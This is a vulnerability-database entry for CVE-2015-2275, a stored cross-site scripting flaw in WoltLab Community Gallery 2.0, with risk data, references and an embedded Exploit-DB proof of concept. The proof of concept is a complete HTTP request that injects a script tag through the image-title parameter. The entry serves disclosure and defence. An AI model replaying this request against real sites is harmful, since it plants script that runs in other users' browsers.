CVE-2015-2275
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
5.3
Description
Cross-site scripting (XSS) vulnerability in WoltLab Community Gallery 2.0 before 2014-12-26 allows remote attackers to inject arbitrary web script or HTML via the parameters[data][7][title] parameter in a saveImageData action to index.php/AJAXProxy.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
WoltLab Community Gallery - Persistent Cross-Site Scripting
#Vulnerability title: Community Gallery - Stored Cross-Site Scripting
vulnerability
#Product: Community Gallery
#Vendor: https://www.woltlab.com
#Affected version: Community Gallery 2.0 before 12/10/2014
#Download link:
https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
#Fixed version: Community Gallery 2.0 after 12/26/2014
#CVE ID: CVE-2015-2275
#Author: Pham Kien Cuong (cuong.k.pham (at) itas (dot) vn [email concealed]) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/
Content-Length: 1300
Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7¶meters%5Bdata%5D%5B7%5D%5BalbumID%5D=1¶meters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3¶meters%5Bdata%5D%5B7%5D%5Bdescription%5D=test¶meters%5Bdata%5D%5B7%5D%5BenableComments%5D=1¶meters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg¶meters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948¶meters%5Bdata%5D%5B7%5D%5Bheight%5D=480¶meters%5Bdata%5D%5B7%5D%5BimageID%5D=7¶meters%5Bdata%5D%5B7%5D%5Blatitude%5D=0¶meters%5Bdata%5D%5B7%5D%5Blongitude%5D=0¶meters%5Bdata%5D%5B7%5D%5Borientation%5D=1¶meters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing¶meters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0¶meters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg¶meters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E¶meters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg¶meters%5Bdata%5D%5B7%5D%5Bwidth%5D=640¶meters%5Bdata%5D%5B7%5D%5Blocation%5D=¶meters%5BisEdit%5D=1
- Vulnerable parameter: parameters[data][7][title]
::DISCLOSURE::
+ 12/10/2014: Detect vulnerability
+ 12/10/2014: Send the detail vulnerability to vendor
+ 03/11/2015: Public information
::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2275Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| wotlab | community_gallery | 2.0 | |
References
- http://packetstormsecurity.com/files/130766/Community-Gallery-2.0-Cross-Site-Scripting.html
- http://seclists.org/fulldisclosure/2015/Mar/65
- http://www.exploit-db.com/exploits/36368
- http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html
- http://www.osvdb.org/119455
- http://www.securityfocus.com/archive/1/534841/100/0/threaded
- http://www.securityfocus.com/bid/73053
- http://packetstormsecurity.com/files/130766/Community-Gallery-2.0-Cross-Site-Scripting.html
- http://seclists.org/fulldisclosure/2015/Mar/65
- http://www.exploit-db.com/exploits/36368
- http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html
- http://www.osvdb.org/119455
- http://www.securityfocus.com/archive/1/534841/100/0/threaded
- http://www.securityfocus.com/bid/73053
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.